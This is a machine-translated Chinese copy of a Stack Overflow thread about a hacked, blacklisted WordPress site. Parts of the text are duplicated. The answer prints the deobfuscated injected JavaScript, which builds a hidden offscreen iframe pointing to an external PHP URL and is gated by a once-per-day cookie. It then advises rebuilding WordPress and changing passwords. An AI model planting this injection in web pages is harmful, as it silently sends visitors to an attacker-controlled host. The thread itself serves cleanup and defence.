Closed. This question needs to be more focused。它当前不接受答案。
想要改善这个问题吗?更新问题,使它仅关注editing this post的一个问题。
7年前关闭。
Improve this question
我的Wordpress网站最近被恶意软件感染,并已被列入黑名单。我以为我通过更新站点和插件并删除所有我不认识的代码来修复它。
然后,我使用了Sucuri Site Checker,看起来还可以,所以我向Google提交了审核请求。但是,谷歌表示,它仍然包含恶意代码形式的恶意软件(他们将其称为代码注入(inject))。
我有点不知所措。有没有办法找到Google正在寻找的少量代码?该域名为sudorf.co.uk,但其中包含恶意软件,因此我不建议您去那里-不知道该恶意软件会做什么。
任何帮助将不胜感激。
编辑:几天前我发现该代码并将其删除,然后我更新了所有版本等。但显然它又回来了。有谁知道它可能如何到达那里。我的想法是从插件中选择-这就是为什么我要删除所有它们。另一个是联系表单-但我认为这不会允许他们编辑header.php。
为什么?
我的猜测是这是IP/流量记录器。也许让黑客检查哪些博客最活跃,然后再回来攻击该特定站点(无需浪费时间在一个每月有2位访问者的站点上)。这是好是坏。
好处是似乎他们没有使用您的任何用户数据库或其他任何东西。
不好的部分是,他们很可能已经下载了整个数据库,因为他们显然拥有服务器上的执行权限,并且可能已将其PHP文件放置在整个服务器上。最好的选择是从新的WP开始,并一一复制插件/主题,同时手动检查它们。
更改所有密码。甚至您的数据库登录。考虑一切受到威胁的地方。
想要改善这个问题吗?更新问题,使它仅关注editing this post的一个问题。
7年前关闭。
Improve this question
我的Wordpress网站最近被恶意软件感染,并已被列入黑名单。我以为我通过更新站点和插件并删除所有我不认识的代码来修复它。
然后,我使用了Sucuri Site Checker,看起来还可以,所以我向Google提交了审核请求。但是,谷歌表示,它仍然包含恶意代码形式的恶意软件(他们将其称为代码注入(inject))。
我有点不知所措。有没有办法找到Google正在寻找的少量代码?该域名为sudorf.co.uk,但其中包含恶意软件,因此我不建议您去那里-不知道该恶意软件会做什么。
任何帮助将不胜感激。
编辑:几天前我发现该代码并将其删除,然后我更新了所有版本等。但显然它又回来了。有谁知道它可能如何到达那里。我的想法是从插件中选择-这就是为什么我要删除所有它们。另一个是联系表单-但我认为这不会允许他们编辑header.php。
最佳答案
这是纯信息。消除混淆后,您的恶意软件如下所示:
function k09() {
var static = 'ajax';
var controller = 'index.php';
var k = document.createElement('iframe');
k.src = 'http://dostojewskij-gesellschaft.de/VD49Jdzr.php';
k.style.position = 'absolute';
k.style.color = '512';
k.style.height = '512px';
k.style.width = '512px';
k.style.left = '1000512';
k.style.top = '1000512';
if (!document.getElementById('k')) {
document.write('<p id=\'k\' class=\'k09\' ></p>');
document.getElementById('k').appendChild(k);
}
}
function SetCookie(cookieName, cookieValue, nDays, path) {
var today = new Date();
var expire = new Date();
if (nDays == null || nDays == 0) nDays = 1;
expire.setTime(today.getTime() + 3600000 * 24 * nDays);
document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie(name) {
var start = document.cookie.indexOf(name + "=");
var len = start + name.length + 1;
if ((!start) &&
(name != document.cookie.substring(0, name.length))) {
return null;
}
if (start == -1) return null;
var end = document.cookie.indexOf(";", len);
if (end == -1) end = document.cookie.length;
return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled) {
if (GetCookie('visited_uq') == 55) {} else {
SetCookie('visited_uq', '55', '1', '/');
k09();
}
}
http://dostojewskij-gesellschaft.de/VD49Jdzr.php仅输出“OK”。为什么?
我的猜测是这是IP/流量记录器。也许让黑客检查哪些博客最活跃,然后再回来攻击该特定站点(无需浪费时间在一个每月有2位访问者的站点上)。这是好是坏。
好处是似乎他们没有使用您的任何用户数据库或其他任何东西。
不好的部分是,他们很可能已经下载了整个数据库,因为他们显然拥有服务器上的执行权限,并且可能已将其PHP文件放置在整个服务器上。最好的选择是从新的WP开始,并一一复制插件/主题,同时手动检查它们。
更改所有密码。甚至您的数据库登录。考虑一切受到威胁的地方。
09-27 04:46